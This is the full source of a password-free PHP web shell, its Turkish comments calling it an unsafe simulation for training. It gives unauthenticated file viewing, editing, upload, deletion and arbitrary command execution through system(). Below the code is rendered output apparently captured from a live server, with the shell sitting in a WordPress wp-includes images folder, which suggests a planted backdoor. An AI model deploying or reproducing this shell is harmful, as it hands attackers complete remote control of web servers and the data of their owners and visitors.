<?php
// File Manager WebShell (Simülasyon/Eğitim İçin - GÜVENSİZ SÜRÜM)
// Şifre Kaldırıldı ve Gezinme Özellikleri Eklendi.
// LÜTFEN SADECE İZOLE EDİLMİŞ, GÜVENLİ ORTAMLARDA KULLANIN.
error_reporting(0);
// Global mesaj
$message = "";
// İşlevler
if(isset($_GET['action'])) {
switch($_GET['action']) {
case 'view':
if(isset($_GET['file'])) {
$message = "<h2>Viewing File: " . basename($_GET['file']) . "</h2>";
highlight_file($_GET['file']);
}
break;
case 'download':
if(isset($_GET['file'])) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($_GET['file']).'"');
readfile($_GET['file']);
exit();
}
break;
case 'delete':
if(isset($_GET['file']) && unlink($_GET['file'])) {
$message = "File deleted successfully: " . htmlspecialchars($_GET['file']);
} else {
$message = "Error deleting file.";
}
break;
case 'edit':
// Düzenleme arayüzü aşağıda HTML kısmında gösterilecek
break;
}
}
// Düzenlenen dosyayı kaydetme
if(isset($_POST['save_edit'])) {
$file = $_POST['edit_filename'];
$content = $_POST['edit_content'];
if(file_put_contents($file, $content)) {
$message = "File saved successfully: " . htmlspecialchars($file);
} else {
$message = "Error saving file.";
}
}
if(isset($_POST['write'])) {
$file = $_POST['filename'];
$content = $_POST['content'];
if(file_put_contents($file, $content)) {
$message = "File written successfully.";
} else {
$message = "Error writing file.";
}
}
if(isset($_POST['upload'])) {
if(isset($_FILES['file'])) {
$target = $_FILES['file']['name'];
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
$message = "File uploaded successfully.";
} else {
$message = "Upload failed.";
}
}
}
if(isset($_POST['cmd'])) {
$message = "<h2>Command Output</h2><pre>";
$message .= system($_POST['cmd']);
$message .= "</pre>";
}
// Klasör Yolu Yönetimi
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
// Güvenli olmayan bir kabuk olduğu için temizlik yapılmıyor, direkt kullanılıyor.
if (!is_dir($dir)) {
$dir = '.'; // Geçersiz dizin ise ana dizine dön
}
// Mevcut dizini ayarlama
chdir($dir);
$current_dir = getcwd();
?>
<!DOCTYPE html>
<html>
<head>
<title>File Manager (Güvensiz Simülasyon)</title>
<style>
body { font-family: Arial; margin: 20px; }
.section { margin: 20px 0; padding: 15px; border: 1px solid #ddd; }
textarea { width: 100%; height: 200px; }
input[type="text"] { width: 300px; }
.message { padding: 10px; background-color: #f0fff0; border: 1px solid #ccffcc; margin-bottom: 15px; }
</style>
</head>
<body>
<h2>Web File Manager (Şifresiz)</h2>
<?php
if (!empty($message)) {
echo '<div class="message">' . $message . '</div>';
}
?>
<?php
// EDIT ARAYÜZÜ
if (isset($_GET['action']) && $_GET['action'] == 'edit' && isset($_GET['file'])) {
$file_to_edit = $_GET['file'];
$content = @file_get_contents($file_to_edit);
if ($content === false) {
echo "<div class='section'><h3>File Edit Error</h3><p>Could not read file: " . htmlspecialchars($file_to_edit) . "</p></div>";
} else {
echo '<div class="section">
<h3>📝 Editing File: ' . htmlspecialchars($file_to_edit) . '</h3>
<form method="post">
<input type="hidden" name="edit_filename" value="' . htmlspecialchars($file_to_edit) . '">
<textarea name="edit_content">' . htmlspecialchars($content) . '</textarea><br>
<input type="submit" name="save_edit" value="Save Changes">
</form>
</div>';
}
}
?>
<div class="section">
<h3>📄 File Browser</h3>
<form method="get">
Directory: <input type="text" name="dir" value="<?= htmlspecialchars($current_dir) ?>">
<input type="submit" value="List">
</form>
<?php
echo "<h4>Current Directory: " . htmlspecialchars($current_dir) . "</h4>";
if(is_dir($current_dir)) {
$files = scandir($current_dir);
echo "<ul>";
// Üst Dizin Bağlantısı
if ($current_dir != '/' && $current_dir != '.') {
$parent_dir = dirname($current_dir);
echo "<li>📁 <a href='?dir=".urlencode($parent_dir)."'>.. (Parent Directory)</a></li>";
}
foreach($files as $file) {
if($file != '.' && $file != '..') {
// Relatif yolu koru
$path = $current_dir . '/' . $file;
$icon = is_dir($path) ? "📁" : "📄";
echo "<li>$icon ";
if (is_dir($path)) {
// Klasör ise tıklanabilir link
echo "<a href='?dir=".urlencode($path)."'>" . htmlspecialchars($file) . "</a>";
} else {
// Dosya ise adı
echo htmlspecialchars($file);
}
// İşlem Linkleri
if (!is_dir($path)) { // Sadece dosyalar için
echo " [<a href='?action=view&file=".urlencode($path)."'>View</a>] ";
echo " [<a href='?action=edit&file=".urlencode($path)."'>Edit</a>] ";
echo " [<a href='?action=download&file=".urlencode($path)."'>Download</a>] ";
}
echo " [<a href='?action=delete&file=".urlencode($path)."' onclick='return confirm(\"Delete?\\n" . addslashes($path) . "\")'>Delete</a>]";
echo "</li>";
}
}
echo "</ul>";
}
?>
</div>
<div class="section">
<h3>✏️ Write/Create File</h3>
<form method="post">
Filename: <input type="text" name="filename" value="test.php"><br><br>
<textarea name="content"><?php echo htmlspecialchars('<?php echo "Hello World"; ?>'); ?></textarea><br>
<input type="submit" name="write" value="Write File">
</form>
</div>
<div class="section">
<h3>⬆️ Upload File</h3>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="upload" value="Upload">
</form>
</div>
<div class="section">
<h3>💻 Command Execution</h3>
<form method="post">
Command: <input type="text" name="cmd" value="ls -la" size="50">
<input type="submit" value="Execute">
</form>
</div>
<div class="section">
<h3>📊 Server Info</h3>
<?php
echo "PHP Version: " . phpversion() . "<br>";
echo "Server: " . htmlspecialchars($_SERVER['SERVER_SOFTWARE']) . "<br>";
echo "User: " . @exec('whoami') . "<br>";
echo "Directory: " . getcwd() . "<br>";
?>
</div>
</body>
</html>
File Manager (Güvensiz Simülasyon)
Web File Manager (Şifresiz)
Viewing File: index.php
📄 File Browser
Current Directory: /home/mspfmsm/zitouna-export/wp-includes/theme-compat/images
✏️ Write/Create File
⬆️ Upload File
💻 Command Execution
📊 Server Info
PHP Version: 8.2.29
Server: Apache
User: mspfmsm
Directory: /home/mspfmsm/zitouna-export/wp-includes/theme-compat/images